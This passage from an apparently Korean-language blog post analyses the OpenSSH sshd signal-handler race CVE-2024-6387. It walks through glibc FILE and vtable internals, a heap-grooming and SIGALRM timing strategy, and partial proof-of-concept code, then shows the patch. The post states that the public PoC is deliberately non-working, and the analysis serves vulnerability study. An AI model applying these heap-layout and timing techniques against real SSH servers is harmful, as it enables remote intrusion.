           fp->_wide_data->_IO_buf_end,
44
           &fp->_wide_data->_IO_read_end);
45

46
      fp->_IO_read_base = fp->_IO_read_ptr;
47
      fp->_IO_read_ptr = (char *) read_stop;
48

49
      /* If we managed to generate some text return the next character.  */
50
      if (fp->_wide_data->_IO_read_ptr < fp->_wide_data->_IO_read_end)
51
  return *fp->_wide_data->_IO_read_ptr;
52

53
      if (status == __codecvt_error)
54
  {
55
    __set_errno (EILSEQ);
56
    fp->_flags |= _IO_ERR_SEEN;
57
    return WEOF;
58
  }
59

60
      /* Move the remaining content of the read buffer to the beginning.  */
61
      memmove (fp->_IO_buf_base, fp->_IO_read_ptr,
62
         fp->_IO_read_end - fp->_IO_read_ptr);
63
      fp->_IO_read_end = (fp->_IO_buf_base
64
        + (fp->_IO_read_end - fp->_IO_read_ptr));
65
      fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;
66
    }
67
  else
68
    fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_read_end =
69
      fp->_IO_buf_base;
70

71
  if (fp->_IO_buf_base == NULL)
72
    {
73
      /* Maybe we already have a push back pointer.  */
74
      if (fp->_IO_save_base != NULL)
75
  {
76
    free (fp->_IO_save_base);
77
    fp->_flags &= ~_IO_IN_BACKUP;
78
  }
79
      _IO_doallocbuf (fp);
80

81
      fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_read_end =
82
  fp->_IO_buf_base;
83
    }
84

85
  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end =
86
    fp->_IO_buf_base;
87

88
  if (fp->_wide_data->_IO_buf_base == NULL)
89
    {
90
      /* Maybe we already have a push back pointer.  */
91
      if (fp->_wide_data->_IO_save_base != NULL)
92
  {
93
    free (fp->_wide_data->_IO_save_base);
94
    fp->_flags &= ~_IO_IN_BACKUP;
95
  }
96
      _IO_wdoallocbuf (fp);
97
    }
98

99
  /* FIXME This can/should be moved to genops ?? */
100
  if (fp->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
101
    {
102
      /* We used to flush all line-buffered stream.  This really isn't
103
   required by any standard.  My recollection is that
104
   traditional Unix systems did this for stdout.  stderr better
105
   not be line buffered.  So we do just that here
106
   explicitly.  --drepper */
107
      _IO_acquire_lock (stdout);
108

109
      if ((stdout->_flags & (_IO_LINKED | _IO_NO_WRITES | _IO_LINE_BUF))
110
    == (_IO_LINKED | _IO_LINE_BUF))
111
  _IO_OVERFLOW (stdout, EOF);
112

113
      _IO_release_lock (stdout);
114
    }
115

116
  _IO_switch_to_get_mode (fp);
117

118
  fp->_wide_data->_IO_read_base = fp->_wide_data->_IO_read_ptr =
119
    fp->_wide_data->_IO_buf_base;
120
  fp->_wide_data->_IO_read_end = fp->_wide_data->_IO_buf_base;
121
  fp->_wide_data->_IO_write_base = fp->_wide_data->_IO_write_ptr =
122
    fp->_wide_data->_IO_write_end = fp->_wide_data->_IO_buf_base;
123

124
  const char *read_ptr_copy;
125
  char accbuf[MB_LEN_MAX];
126
  size_t naccbuf = 0;
127
 again:
128
  count = _IO_SYSREAD (fp, fp->_IO_read_end,
129
           fp->_IO_buf_end - fp->_IO_read_end);
130
  if (count <= 0)
131
    {
132
      if (count == 0 && naccbuf == 0)
133
  {
134
    fp->_flags |= _IO_EOF_SEEN;
135
    fp->_offset = _IO_pos_BAD;
136
  }
137
      else
138
  fp->_flags |= _IO_ERR_SEEN, count = 0;
139
    }
140
  fp->_IO_read_end += count;
141
  if (count == 0)
142
    {
143
      if (naccbuf != 0)
144
  /* There are some bytes in the external buffer but they don't
145
     convert to anything.  */
146
  __set_errno (EILSEQ);
147
      return WEOF;
148
    }
149
  if (fp->_offset != _IO_pos_BAD)
150
    _IO_pos_adjust (fp->_offset, count);
151

152
  /* Now convert the read input.  */
153
  fp->_wide_data->_IO_last_state = fp->_wide_data->_IO_state;
154
  fp->_IO_read_base = fp->_IO_read_ptr;
155
  const char *from = fp->_IO_read_ptr;
156
  const char *to = fp->_IO_read_end;
157
  size_t to_copy = count;
158
  if (__glibc_unlikely (naccbuf != 0))
159
    {
160
      to_copy = MIN (sizeof (accbuf) - naccbuf, count);
161
      to = __mempcpy (&accbuf[naccbuf], from, to_copy);
162
      naccbuf += to_copy;
163
      from = accbuf;
164
    }
165
  status = __libio_codecvt_in (cd, &fp->_wide_data->_IO_state,
166
             from, to, &read_ptr_copy,
167
             fp->_wide_data->_IO_read_end,
168
             fp->_wide_data->_IO_buf_end,
169
             &fp->_wide_data->_IO_read_end);
170

171
  if (__glibc_unlikely (naccbuf != 0))
172
    fp->_IO_read_ptr += MAX (0, read_ptr_copy - &accbuf[naccbuf - to_copy]);
173
  else
174
    fp->_IO_read_ptr = (char *) read_ptr_copy;
175
  if (fp->_wide_data->_IO_read_end == fp->_wide_data->_IO_buf_base)
176
    {
177
      if (status == __codecvt_error)
178
  {
179
  out_eilseq:
180
    __set_errno (EILSEQ);
181
    fp->_flags |= _IO_ERR_SEEN;
182
    return WEOF;
183
  }
184

185
      /* The read bytes make no complete character.  Try reading again.  */
186
      assert (status == __codecvt_partial);
187

188
      if (naccbuf == 0)
189
  {
190
    if (fp->_IO_read_base < fp->_IO_read_ptr)
191
      {
192
        /* Partially used the buffer for some input data that
193
     produces no output.  */
194
        size_t avail = fp->_IO_read_end - fp->_IO_read_ptr;
195
        memmove (fp->_IO_read_base, fp->_IO_read_ptr, avail);
196
        fp->_IO_read_ptr = fp->_IO_read_base;
197
        fp->_IO_read_end -= avail;
198
        goto again;
199
      }
200
    naccbuf = fp->_IO_read_end - fp->_IO_read_ptr;
201
    if (naccbuf >= sizeof (accbuf))
202
      goto out_eilseq;
203

204
    memcpy (accbuf, fp->_IO_read_ptr, naccbuf);
205
  }
206
      else
207
  {
208
    size_t used = read_ptr_copy - accbuf;
209
    if (used > 0)
210
      {
211
        memmove (accbuf, read_ptr_copy, naccbuf - used);
212
        naccbuf -= used;
213
      }
214

215
    if (naccbuf == sizeof (accbuf))
216
      goto out_eilseq;
217
  }
218

219
      fp->_IO_read_ptr = fp->_IO_read_end = fp->_IO_read_base;
220

221
      goto again;
222
    }
223

224
  return *fp->_wide_data->_IO_read_ptr;
225
}
226
libc_hidden_def (_IO_wfile_underflow)

`_IO_wfile_underflow`는 다음 흐름을 갖는데 이때 `__fct` 함수 포인터를 조작할 수 있기 때문에 원하는 코드를 실행시킬 수 있습니다.

libio/iofwide.c

```c enum __codecvt_result __libio_codecvt_in (struct _IO_codecvt *codecvt, __mbstate_t *statep, const char *from_start, const char *from_end, const char **from_stop, wchar_t *to_start, wchar_t *to_end, wchar_t **to_stop) { enum __codecvt_result result;

struct __gconv_step *gs = codecvt->__cd_in.step; int status; size_t dummy; const unsigned char *from_start_copy = (unsigned char *) from_start;

codecvt->__cd_in.step_data.__outbuf = (unsigned char *) to_start; codecvt->__cd_in.step_data.__outbufend = (unsigned char *) to_end; codecvt->__cd_in.step_data.__statep = statep;

__gconv_fct fct = gs->__fct; #ifdef PTR_DEMANGLE if (gs->__shlib_handle != NULL) PTR_DEMANGLE (fct); #endif

status = DL_CALL_FCT (fct, (gs, &codecvt->__cd_in.step_data, &from_start_copy, (const unsigned char *) from_end, NULL, &dummy, 0, 0));

*from_stop = (const char *) from_start_copy; *to_stop = (wchar_t *) codecvt->__cd_in.step_data.__outbuf;

switch (status) { case __GCONV_OK: case __GCONV_EMPTY_INPUT: result = __codecvt_ok; break;

1
case __GCONV_FULL_OUTPUT:
2
case __GCONV_INCOMPLETE_INPUT:
3
  result = __codecvt_partial;
4
  break;
5

6
default:
7
  result = __codecvt_error;
8
  break;
9
}

return result; }

1
</div>
2
</details>
3

4

5
여기에서 함수 포인터로 참조되는 멤버의 구조는 다음과 같이 구성되게됩니다.
6

7
<p align="center"><img width="100%" src="/assets/img/CVE-2024-6387/structure_graph.png"/></p>
8

9
<details>
10
<summary>libio/libioP.h</summary>
11
<div markdown="1">
12
```c
13
struct _IO_jump_t
14
{
15
    JUMP_FIELD(size_t, __dummy);
16
    JUMP_FIELD(size_t, __dummy2);
17
    JUMP_FIELD(_IO_finish_t, __finish);
18
    JUMP_FIELD(_IO_overflow_t, __overflow);
19
    JUMP_FIELD(_IO_underflow_t, __underflow);
20
    JUMP_FIELD(_IO_underflow_t, __uflow);
21
    JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
22
    /* showmany */
23
    JUMP_FIELD(_IO_xsputn_t, __xsputn);
24
    JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
25
    JUMP_FIELD(_IO_seekoff_t, __seekoff);
26
    JUMP_FIELD(_IO_seekpos_t, __seekpos);
27
    JUMP_FIELD(_IO_setbuf_t, __setbuf);
28
    JUMP_FIELD(_IO_sync_t, __sync);
29
    JUMP_FIELD(_IO_doallocate_t, __doallocate);
30
    JUMP_FIELD(_IO_read_t, __read);
31
    JUMP_FIELD(_IO_write_t, __write);
32
    JUMP_FIELD(_IO_seek_t, __seek);
33
    JUMP_FIELD(_IO_close_t, __close);
34
    JUMP_FIELD(_IO_stat_t, __stat);
35
    JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
36
    JUMP_FIELD(_IO_imbue_t, __imbue);
37
};
38

39
/* We always allocate an extra word following an _IO_FILE.
40
   This contains a pointer to the function jump table used.
41
   This is for compatibility with C++ streambuf; the word can
42
   be used to smash to a pointer to a virtual function table. */
43

44
struct _IO_FILE_plus
45
{
46
  FILE file;
47
  const struct _IO_jump_t *vtable;
48
};

libio/bits/types/struct_FILE.h:struct _IO_FILE

```c /* The tag name of this struct is _IO_FILE to preserve historic C++ mangled names for functions taking FILE* arguments. That name should not be used in new code. */ struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */

/* The following pointers correspond to the C++ streambuf protocol. */ char _IO_read_ptr; / Current read pointer */ char _IO_read_end; / End of get area. */ char _IO_read_base; / Start of putback+get area. */ char _IO_write_base; / Start of put area. */ char _IO_write_ptr; / Current put pointer. */ char _IO_write_end; / End of put area. */ char _IO_buf_base; / Start of reserve area. */ char _IO_buf_end; / End of reserve area. */

/* The following fields are used to support backing up and undo. */ char _IO_save_base; / Pointer to start of non-current get area. */ char _IO_backup_base; / Pointer to first valid character of backup area */ char _IO_save_end; / Pointer to end of non-current get area. */

struct _IO_marker *_markers;

struct _IO_FILE *_chain;

int _fileno; int _flags2; __off_t _old_offset; /* This used to be _offset but it’s too small. */

/* 1+column number of pbase(); 0 is unknown. */ unsigned short _cur_column; signed char _vtable_offset; char _shortbuf[1];

_IO_lock_t *_lock; #ifdef _IO_USE_OLD_IO_FILE };

struct _IO_FILE_complete { struct _IO_FILE _file; #endif __off64_t _offset; /* Wide character stream stuff. */ struct _IO_codecvt *_codecvt; struct _IO_wide_data *_wide_data; struct _IO_FILE *_freeres_list; void _freeres_buf; size_t __pad5; int _mode; / Make sure we don’t get into trouble again. */ char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)]; };

1
</div>
2
</details>
3

4
<details>
5
<summary>libio.h:_IO_codecvt</summary>
6
<div markdown="1">
7
```c
8
struct _IO_codecvt
9
{
10
  _IO_iconv_t __cd_in;
11
  _IO_iconv_t __cd_out;
12
};

libio.h:_IO_iconv_t

```c typedef struct { struct __gconv_step *step; struct __gconv_step_data step_data; } _IO_iconv_t; ```

gconv.h:__gconv_step

```c /* Description of a conversion step. */ struct __gconv_step { struct __gconv_loaded_object *__shlib_handle; const char *__modname;

/* For internal use by glibc. (Accesses to this member must occur when the internal __gconv_lock mutex is acquired). */ int __counter;

char *__from_name; char *__to_name;

__gconv_fct __fct; __gconv_btowc_fct __btowc_fct; __gconv_init_fct __init_fct; __gconv_end_fct __end_fct;

/* Information about the number of bytes needed or produced in this step. This helps optimizing the buffer sizes. */ int __min_needed_from; int __max_needed_from; int __min_needed_to; int __max_needed_to;

/* Flag whether this is a stateful encoding or not. */ int __stateful;

void __data; / Pointer to step-local data. */ };

1
</div>
2
</details>
3

4
<details>
5
<summary>iconv/gconv.h:__gconv_fct</summary>
6
<div markdown="1">
7
```c
8
/* Type of a conversion function.  */
9
typedef int (*__gconv_fct) (struct __gconv_step *, struct __gconv_step_data *,
10
          const unsigned char **, const unsigned char *,
11
          unsigned char **, size_t *, int, int);

Exploit strategy#

SIGALRM에 의해서 어떻게 Exploit을 달성하는지 알아봅시다.

1
1449 #define set_head(p, s)       ((p)->mchunk_size = (s))
2
------------------------------------------------------------------------
3
3765 _int_malloc (mstate av, size_t bytes)
4
3766 {
5
....
6
3798   nb = checked_request2size (bytes);
7
....
8
4295               size = chunksize (victim);
9
....
10
4300               remainder_size = size - nb;
11
....
12
4316                   remainder = chunk_at_offset (victim, nb);
13
....
14
4320                   bck = unsorted_chunks (av);
15
4321                   fwd = bck->fd;
16
....
17
4324                   remainder->bk = bck;
18
4325                   remainder->fd = fwd;
19
4326                   bck->fd = remainder;
20
4327                   fwd->bk = remainder;
21
....
22
4337                   set_head (victim, nb | PREV_INUSE |
23
4338                             (av != &main_arena ? NON_MAIN_ARENA : 0));
24
4339                   set_head (remainder, remainder_size | PREV_INUSE);
25
....
26
4343               void *p = chunk2mem (victim);
27
....
28
4345               return p;

malloc에서 4327행이 실행된 이후에 4339행 이전이 실행되기전 SIGALRM에 의해 malloc이 중단되는 경우를 이용합니다.

그렇게되면 remainder가 쪼개졌지만 크기는 갱신되지 않은 상태로 unsorted 리스트에 연결되게 됩니다. 이때의 크기 필드값은 갱신되지 않았기 때문에 이전에 이 청크를 할당받은 데이터가 그대로 남아있어 해당 값이 크기 데이터로 사용되게 됩니다. 이렇게하여 커진 remainder chunk의 크기는 뒷쪽을 덮어쓸 수 있을만큼 커질 수 있습니다.

이를 악용하는 흐름은 다음과 같습니다.

Large hole(8KB 크기의 free된 청크)와 small hole(320B 크기의 free된 청크)가 존재합니다.
4KB 크기의 청크를 요청하여 Large hole을 두 개의 청크로 나누도록 유도합니다.
- 이때 해당 작업에 의해 Large hole이 두 개의 청크로 나뉘어진 뒤 위의 4339행이 실행되기전에 SIGALRM에 의해서 malloc의 처리가 중단됩니다.
- 이렇게 처리가 중단된 free remainder 청크의 크기는 이전 값에 의해서 결정됩니다.
- remainder의 크기가 갱신되지 않고 이전 값(찌거기 값)에 의해서 크기가 증가했기 때문에 청크는 뒤의 small hole까지 겹치게됩니다.
SIGARLM의 syslog에서 앞서 알아본 흐름에 의해 fopen을 호출해 FILE 구조체가 small hole에 할당됩니다.
- 이는 앞선 처리에 의해 remainder 청크와 겹치는 영역이 됩니다.
인위적으로 증가한 remainder 청크는 fopen 이후의 __fread_unlocked에서 4KB read buffer를 할당받는 과정에서 한번 더 쪼개지게됩니다.
remainder 청크가 기록되고 FILE의 _vtable_offset 멤버가 remainder 청크의 bk 필드의 3번째 바이트로 덮어씌워지게됩니다.(0x61)
- 이때 FILE 구조체의 _codevt 멤버는 glibc의 malloc 빈 중 하나를 가리키게 덮어씌워집니다.
- 이때의 가정은 해당 주소를 모두 공격자가 안다고 가정합니다.

위의 설명만 봐도 엄청나게 까다로운 조건이 있다는 것을 알 수 있습니다. 이런 까다로운 조건들을 다시 정리해보면 다음과 같습니다.

공격을 성공시키기 위해선 glibc FILE 구조체의 _vtable_offset이 활성화 되어있어야 하기 때문에 현재 정리된 글에선 i386 glibc만 가능합니다.
또한 i386 sshd의 메모리가 0xb7200000 또는 0xb7400000에만 매핑된다는 점을 악용합니다.
- 이를 이용해 ASLR을 최대한 우회하고 이미 알고 있는 주소를 활용합니다.
앞선 언급과 같이 이미 주소값들을 알고 있다는 가정으로 시작을 하기 때문에 _vtable_offset을 덮어쓸 때 쓰는 bk값 역시 0xb761d7f8로 고정입니다.
- 해당 값의 3번째 바이트 값이 0x61이므로 _vtable_offset이 0x61로 오염된다고 가정할 수 있습니다.
FILE을 덮어쓰기 위해 정확한 타이밍에 위 레이아웃을 달성한 상태로 malloc의 수행 중에 SIGALRM이 발생해야합니다.

위와 같은 시나리오를 성공적으로 달성하기 위해 실험에서는 다음과 같은 레이아웃을 구상하여 레이스 컨디션에서 목적을 달성하려합니다.

힙 레이아웃을 어떻게 이렇게 만들까요? 다음 함수들을 이용합니다.

1
1754 cert_parse(struct sshbuf *b, struct sshkey *key, struct sshbuf *certbuf)
2
1755 {
3
....
4
1797         while (sshbuf_len(principals) > 0) {
5
....
6
1805                 if ((ret = sshbuf_get_cstring(principals, &principal,
7
....
8
1820                 key->cert->principals[key->cert->nprincipals++] = principal;
9
1821         }
10
------------------------------------------------------------------------
11
 562 cert_free(struct sshkey_cert *cert)
12
 563 {
13
 ...
14
 572         for (i = 0; i < cert->nprincipals; i++)
15
 573                 free(cert->principals[i]);

함수 명에서도 볼 수 있듯 공개 키 파싱 코드를 악용해서 위의 힙 레이아웃을 만들게됩니다. 이때 cert_parse의 1805행에 위치한 sshbuf_get_cstring과 cert_free의 573행에 위치한 free를 이용합니다.

sshbuf_get_cstring은 다음과 같이 malloc을 사용합니다.

1
int
2
sshbuf_get_cstring(struct sshbuf *buf, char **valp, size_t *lenp)
3
{
4
  size_t len;
5
  const u_char *p, *z;
6
  int r;
7

8
  if (valp != NULL)
9
    *valp = NULL;
10
  if (lenp != NULL)
11
    *lenp = 0;
12
  if ((r = sshbuf_peek_string_direct(buf, &p, &len)) != 0)
13
    return r;
14
  /* Allow a \0 only at the end of the string */
15
  if (len > 0 &&
16
      (z = memchr(p , '\0', len)) != NULL && z < p + len - 1) {
17
    SSHBUF_DBG(("SSH_ERR_INVALID_FORMAT"));
18
    return SSH_ERR_INVALID_FORMAT;
19
  }
20
  if ((r = sshbuf_skip_string(buf)) != 0)
21
    return -1;
22
  if (valp != NULL) {
23
    if ((*valp = malloc(len + 1)) == NULL) {
24
      SSHBUF_DBG(("SSH_ERR_ALLOC_FAIL"));
25
      return SSH_ERR_ALLOC_FAIL;
26
    }
27
    if (len != 0)
28
      memcpy(*valp, p, len);
29
    (*valp)[len] = '\0';
30
  }
31
  if (lenp != NULL)
32
    *lenp = (size_t)len;
33
  return 0;
34
}

위에서 알아본 힙 레이아웃을 달성하기 위해서 sshd에 다음과 같은 5개의 서로 다른 공개 키 패킷을 전송합니다.

a : tcache 크기의 청크를 malloc하고 free하기 위한 패킷
b : 다양한 크기(~8KB, 320B hole)의 청크를 malloc하고 free하여 27개의 large hole, small hole 쌍을 만들기 위한 패킷
c : 이미 free된 청크들이 익스플로잇에서 조작된 값을 사용할 수 있게 미리 값들을 세팅해두는 패킷
- remainder의 크기를 크게 만들 가짜 헤더를 중간에 기록
- glibc의 보안 검사를 통과하기 위한 footer를 small hole 끝 부분에 기록
- fake vtable과 _codecvt 포인터를 small hole에 기록
d : 앞서 free한 청크들이 unsorted bin에서 각각의 large bin과 small bin에 배치될 수 있도록 하는 패킷
e : 27개의 쌍을 이용해 레이스 컨디션을 수행하기 위한 패킷(앞서 알아본 힙 레이아웃 조작을 위한 시퀀스 수행 : malloc(~4KB), malloc(304), malloc(~4KB), malloc(304))

Timing strategy#

여러 제약 사항 때문에 결과적으로 다음과 같은 함수에서 시간을 측정하여 패킷 전송 타이밍을 맞추게됩니다.

1
 88 userauth_pubkey(struct ssh *ssh, const char *method)
2
 89 {
3
...
4
138         if (pktype == KEY_UNSPEC) {
5
139                 /* this is perfectly legal */
6
140                 verbose_f("unsupported public key algorithm: %s", pkalg);
7
141                 goto done;
8
142         }
9
143         if ((r = sshkey_from_blob(pkblob, blen, &key)) != 0) {
10
144                 error_fr(r, "parse key");
11
145                 goto done;
12
146         }
13
...
14
151         if (key->type != pktype) {
15
152                 error_f("type mismatch for decoded key "
16
153                     "(received %d, expected %d)", key->type, pktype);
17
154                 goto done;
18
155         }

공개 키 패킷 중 pktype에 오류가 발생하게끔 데이터를 설정해 138~142행에서 패킷 오류가 발생하게 합니다.
두 번째로 공개 키 패킷 중 key->type에 오류가 발생하게끔 데이터를 설정해 151~155행에서 패킷 오류가 발생하게 합니다.
이때 143행에 존재하는 sshkey_from_blob은 공개키를 파싱하는 함수로 위에서 알아본 양옆에있는 두 함수의 응답 시간의 차가 sshd가 공개 키를 파싱하는 데 걸리는 시간이 됩니다.
이를 통해 마지막 패킷의 전송시간을 조절합니다.

sshkey_from_blob은 다음과 같은 흐름으로 cert_parse를 호출합니다.

sshkey.c:sshkey_from_blob

```c int sshkey_from_blob(const u_char *blob, size_t blen, struct sshkey **keyp) { struct sshbuf *b; int r;

1
if ((b = sshbuf_from(blob, blen)) == NULL)
2
  return SSH_ERR_ALLOC_FAIL;
3
r = sshkey_from_blob_internal(b, keyp, 1);
4
sshbuf_free(b);
5
return r;

}

1
</div>
2
</details>
3

4
<details>
5
<summary>sshkey.c:sshkey_from_blob_internal</summary>
6
<div markdown="1">
7
```c
8
static int
9
sshkey_from_blob_internal(struct sshbuf *b, struct sshkey **keyp,
10
    int allow_cert)
11
{
12
  int type, ret = SSH_ERR_INTERNAL_ERROR;
13
  char *ktype = NULL;
14
  struct sshkey *key = NULL;
15
  struct sshbuf *copy;
16
  const struct sshkey_impl *impl;
17

18
#ifdef DEBUG_PK /* XXX */
19
  sshbuf_dump(b, stderr);
20
#endif
21
  if (keyp != NULL)
22
    *keyp = NULL;
23
  if ((copy = sshbuf_fromb(b)) == NULL) {
24
    ret = SSH_ERR_ALLOC_FAIL;
25
    goto out;
26
  }
27
  if (sshbuf_get_cstring(b, &ktype, NULL) != 0) {
28
    ret = SSH_ERR_INVALID_FORMAT;
29
    goto out;
30
  }
31

32
  type = sshkey_type_from_name(ktype);
33
  if (!allow_cert && sshkey_type_is_cert(type)) {
34
    ret = SSH_ERR_KEY_CERT_INVALID_SIGN_KEY;
35
    goto out;
36
  }
37
  if ((impl = sshkey_impl_from_type(type)) == NULL) {
38
    ret = SSH_ERR_KEY_TYPE_UNKNOWN;
39
    goto out;
40
  }
41
  if ((key = sshkey_new(type)) == NULL) {
42
    ret = SSH_ERR_ALLOC_FAIL;
43
    goto out;
44
  }
45
  if (sshkey_type_is_cert(type)) {
46
    /* Skip nonce that preceeds all certificates */
47
    if (sshbuf_get_string_direct(b, NULL, NULL) != 0) {
48
      ret = SSH_ERR_INVALID_FORMAT;
49
      goto out;
50
    }
51
  }
52
  if ((ret = impl->funcs->deserialize_public(ktype, b, key)) != 0)
53
    goto out;
54

55
  /* Parse certificate potion */
56
  if (sshkey_is_cert(key) && (ret = cert_parse(b, key, copy)) != 0)
57
    goto out;
58

59
  if (key != NULL && sshbuf_len(b) != 0) {
60
    ret = SSH_ERR_INVALID_FORMAT;
61
    goto out;
62
  }
63
  ret = 0;
64
  if (keyp != NULL) {
65
    *keyp = key;
66
    key = NULL;
67
  }
68
 out:
69
  sshbuf_free(copy);
70
  sshkey_free(key);
71
  free(ktype);
72
  return ret;
73
}

사실상 위에서 알아본 제약 사항 때문에 해당 취약점을 이용하는 것은 많이 힘들어보입니다. 또한 환경에 대한 제약 역시 큽니다. 이제 PoC를 확인해봅시다.

PoC Analysis#

PoC가 현재 공개된 상태지만 의도적으로 해당 PoC는 작동하지않게 작성되어있습니다.

PoC는 앞서 알아본 다음과 같은 순서로 패킷을 전송합니다.

a : tcache 크기의 청크를 malloc하고 free하기 위한 패킷
b : 다양한 크기(~8KB, 320B hole)의 청크를 malloc하고 free하여 27개의 large hole, small hole 쌍을 만들기 위한 패킷
c : 이미 free된 청크들이 익스플로잇에서 조작된 값을 사용할 수 있게 미리 값들을 세팅해두는 패킷
- remainder의 크기를 크게 만들 가짜 헤더를 중간에 기록
- glibc의 보안 검사를 통과하기 위한 footer를 small hole 끝 부분에 기록
- fake vtable과 _codecvt 포인터를 small hole에 기록
d : 앞서 free한 청크들이 unsorted bin에서 각각의 large bin과 small bin에 배치될 수 있도록 하는 패킷
e : 27개의 쌍을 이용해 레이스 컨디션을 수행하기 위한 패킷(앞서 알아본 힙 레이아웃 조작을 위한 시퀀스 수행 : malloc(~4KB), malloc(304), malloc(~4KB), malloc(304))

PoC에서 역시 glibc를 다음과 같은 두 개의 주소중 하나라고 가정합니다.

1
// Possible glibc base addresses (for ASLR bypass)
2
uint64_t GLIBC_BASES[] = { 0xb7200000, 0xb7400000 };
3
int NUM_GLIBC_BASES = sizeof (GLIBC_BASES) / sizeof (GLIBC_BASES[0]);

main 함수의 핵심적인 부분을 살펴봅시다.

1
int
2
main (int argc, char *argv[])
3
{
4
  ...
5
          prepare_heap (sock);
6
          time_final_packet (sock, &parsing_time);
7

8
          if (attempt_race_condition (sock, parsing_time, glibc_base))
9
            {
10
              printf ("Possible exploitation success on attempt %d with glibc "
11
                      "base 0x%lx!\n",
12
                      attempt, glibc_base);
13
              success = 1;
14
              break;
15
            }
16
}

위에 나타난 함수들 중 prepare_heap 함수에서 a~d의 역할을 하는 패킷들이 전송됩니다.

1
void
2
prepare_heap (int sock)
3
{
4
  // Packet a: Allocate and free tcache chunks
5
  for (int i = 0; i < 10; i++)
6
    {
7
      unsigned char tcache_chunk[64];
8
      memset (tcache_chunk, 'A', sizeof (tcache_chunk));
9
      send_packet (sock, 5, tcache_chunk, sizeof (tcache_chunk));
10
      // These will be freed by the server, populating tcache
11
    }
12

13
  // Packet b: Create 27 pairs of large (~8KB) and small (320B) holes
14
  for (int i = 0; i < 27; i++)
15
    {
16
      // Allocate large chunk (~8KB)
17
      unsigned char large_hole[8192];
18
      memset (large_hole, 'B', sizeof (large_hole));
19
      send_packet (sock, 5, large_hole, sizeof (large_hole));
20

21
      // Allocate small chunk (320B)
22
      unsigned char small_hole[320];
23
      memset (small_hole, 'C', sizeof (small_hole));
24
      send_packet (sock, 5, small_hole, sizeof (small_hole));
25
    }
26

27
  // Packet c: Write fake headers, footers, vtable and _codecvt pointers
28
  for (int i = 0; i < 27; i++)
29
    {
30
      unsigned char fake_data[4096];
31
      create_fake_file_structure (fake_data, sizeof (fake_data),
32
                                  GLIBC_BASES[0]);
33
      send_packet (sock, 5, fake_data, sizeof (fake_data));
34
    }
35

36
  // Packet d: Ensure holes are in correct malloc bins (send ~256KB string)
37
  unsigned char large_string[MAX_PACKET_SIZE - 1];
38
  memset (large_string, 'E', sizeof (large_string));
39
  send_packet (sock, 5, large_string, sizeof (large_string));
40
}

prepare_heap이 완료되면 time_final_paket 함수를 통해서 공개키가 파싱되는 타이밍을 알아냅니다.

1
void
2
time_final_packet (int sock, double *parsing_time)
3
{
4
  double time_before = measure_response_time (sock, 1);
5
  double time_after = measure_response_time (sock, 2);
6
  *parsing_time = time_after - time_before;
7

8
  printf ("Estimated parsing time: %.6f seconds\n", *parsing_time);
9
}

위에서 알아낸 타이밍을 기반으로 레이스 컨디션을 수행합니다.

1
...
2
attempt_race_condition (sock, parsing_time, glibc_base)
3
...

Patch#

sshd.c에 위치한 grace_alarm_handler 함수가 sshd-session.c로 옮겨가며 다음과 같이 코드가 수정되었습니다.

1
/*
2
 * Signal handler for the alarm after the login grace period has expired.
3
 * As usual, this may only take signal-safe actions, even though it is
4
 * terminal.
5
 */
6
static void
7
grace_alarm_handler(int sig)
8
{
9
  /*
10
   * Try to kill any processes that we have spawned, E.g. authorized
11
   * keys command helpers or privsep children.
12
   */
13
  if (getpgid(0) == getpid()) {
14
    struct sigaction sa;
15

16
    /* mask all other signals while in handler */
17
    memset(&sa, 0, sizeof(sa));
18
    sa.sa_handler = SIG_IGN;
19
    sigfillset(&sa.sa_mask);
20
    sa.sa_flags = SA_RESTART;
21
    (void)sigaction(SIGTERM, &sa, NULL);
22
    kill(0, SIGTERM);
23
  }
24
  _exit(EXIT_LOGIN_GRACE);
25
}